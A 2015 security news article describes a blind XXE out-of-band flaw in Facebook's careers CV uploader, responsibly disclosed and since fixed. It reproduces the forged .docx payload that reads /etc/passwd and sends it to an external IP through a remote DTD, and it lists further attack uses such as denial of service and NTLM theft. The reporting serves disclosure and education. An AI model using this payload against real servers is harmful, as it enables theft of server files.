Pierluigi Paganini January 01, 2015

A security expert discovered a vulnerability in Facebook that allows to perform several malicious activities just uploading a forged Microsoft Word file.

Security researcher Mohamed Ramadan has discovered a critical vulnerability in Facebook which allows an attacker to hack users’ account using a forged Microsoft Word .docx file. Ramadan is not new to this kind of discoveries, he has already found in the past several vulnerabilities in web services provided by Facebook, Google, Microsoft and Twitter.

Ramadan was performing a reconnaissance of Facebook service when he came onto Facebook’s career page, usually this kind of page allows users to submit their CV through an uploader component. The expert successfully uploaded his CV to the Facebook platform. The Facebook uploader allows only files in PDF or .DOCX formats, then he had the idea to exploit the .docx file, a format designed by Microsoft that basically can be assimilated to a zipped xml file.  At this point, he created a fake CV with forged Microsoft Word document and uploaded onto the Facebook careers web page. Below a piece of code included in the XML file he has written.

DOCTYPE root [

<!ENTITY % file SYSTEM “file:///etc/passwd”>

dtd SYSTEM “http://197.37.102.90/ext.dtd”>

%dtd;

%send;

]]>

He started an HTTP server running on Python on his local machine and he created a file named ext.dtd in the mohaab007 directory.  This is the content retrieved of ext.dtd:

<!ENTITY % all

“ x25; send SYSTEM ‘http://197.37.102.90/FACEBOOK-HACKED?%25file;’>”

>

%all;

After uploading the forged Word CV the researcher waited for the Facebook response.

“Now everything is good and then I uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute but Nothing happened. I said to myself it is a total failure and I will check my Facebook profile instead and chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minute  or so chatting and browsing now it is time to stop python http server and close Facebook and everything . I was going to close my terminal window and I was shocked to see that something connected to my python http server” he stated in a blog post.

The result is surprising, Ramadan forced a Facebook server to connect to his Python HTTP server, a circumstance that open the doors to several attack scenarios as explained by the expert.

• DoS  the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con
•  TCP scans using HTTP external entities (including behind firewalls since application servers often have worldview different from that of the attacker)
• Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back)
• DoS on other systems (if parsing system is allowed to establish TCP connections to other systems)
•  NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)
• Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS.
• Directory Listing, Read system and application files and in some cases execute system commands using php expect://:// wrapper.

The expert tried to access to Facebook server file system, but failed probably due to security mechanisms the company implemented. The expert anyway was confident that the attack he reproduced was Blind XXE (XML External Entity) Out Of Band (OOB) and noticed also that it was a time-consuming process because he needed  to upload and wait the result after more than 15 minutes. Ramadan ethically reported his findings to Facebook that were rejected the first time.

As further evidence of his hack he provided also the forged CV used to force the Facebook server to contact his machine, but he received another negative reply:

He provided other details on his test to the Facebook Security team, which ultimately realized the existence of a serious vulnerability in its file uploader and rewarded Ramadan for his discovery.

Facebook fixed the vulnerability in  the uploading mechanism by adding this line of code:

“ libxml_disable_entity_loader(true)“

Following is a PoC video of the Facebook Blind XXE OOB:

Pierluigi Paganini

(Security Affairs –  Facebook, hacking)